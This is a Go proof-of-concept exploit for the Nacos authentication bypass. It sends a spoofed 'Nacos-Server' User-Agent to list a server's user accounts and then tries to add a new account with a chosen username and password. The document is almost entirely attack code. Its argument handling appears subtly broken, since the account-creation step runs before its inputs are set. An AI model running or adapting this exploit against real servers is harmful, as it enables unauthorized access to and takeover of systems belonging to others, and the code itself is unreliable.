README.md
Rendering markdown...
package main
import (
"fmt"
"io"
"net/http"
"os"
"regexp"
"strings"
)
func setRoute(u string) {
url := u + "nacos/v1/auth/users?pageNo=1&pageSize=9"
httpClient := &http.Client{}
requests, err := http.NewRequest("GET", url, nil)
requests.Header.Set("User-Agent", "Nacos-Server")
if err != nil {
panic(err)
}
res, err := httpClient.Do(requests)
if err != nil {
panic(err)
}
defer res.Body.Close()
content, _ := io.ReadAll(res.Body)
if res.StatusCode == 200 && strings.Contains(string(content), "pageItems") {
res := regexp.MustCompile(`\[\{(.*)}]`)
if res == nil {
panic(res)
}
rs1 := res.FindAllStringSubmatch(string(content), -1)
fmt.Println("[*]测试地址:" + u + "nacos")
fmt.Println("[*]存在:", rs1[0][1])
} else {
fmt.Println("[!]状态码:", res.StatusCode, "检查版本是否存在漏洞范围")
}
defer refResh(u)
}
var username = "cve-test"
var password = "cve-test@tset"
var refresh = false
func refResh(u string) {
if !refresh {
return
}
url := u + "nacos/v1/auth/users?username=" + username + "&password=" + password
httpClient := &http.Client{}
requests, err := http.NewRequest("POST", url, nil)
requests.Header.Set("User-Agent", "Nacos-Server")
if err != nil {
panic(err)
}
res, err := httpClient.Do(requests)
if err != nil {
panic(err)
}
defer res.Body.Close()
content, _ := io.ReadAll(res.Body)
if res.StatusCode == 200 && strings.Contains(string(content), "create user ok") {
fmt.Println("[*]状态码:", res.StatusCode)
fmt.Println("[*]用户:" + username + " 密码:" + password)
} else {
fmt.Println("[!]状态码:", res.StatusCode)
}
}
func main() {
logo1 := "运行: " + os.Args[0] + " ip "
if len(os.Args) <= 1 {
fmt.Println(logo1)
} else {
aa := os.Args[1]
if aa[len(aa)-1:] == "/" {
setRoute(aa)
} else {
fmt.Println("请检查url格式")
}
if len(os.Args) >= 3 {
username = os.Args[2]
refresh = true
}
if len(os.Args) == 4 {
password = os.Args[3]
refresh = true
}
}
}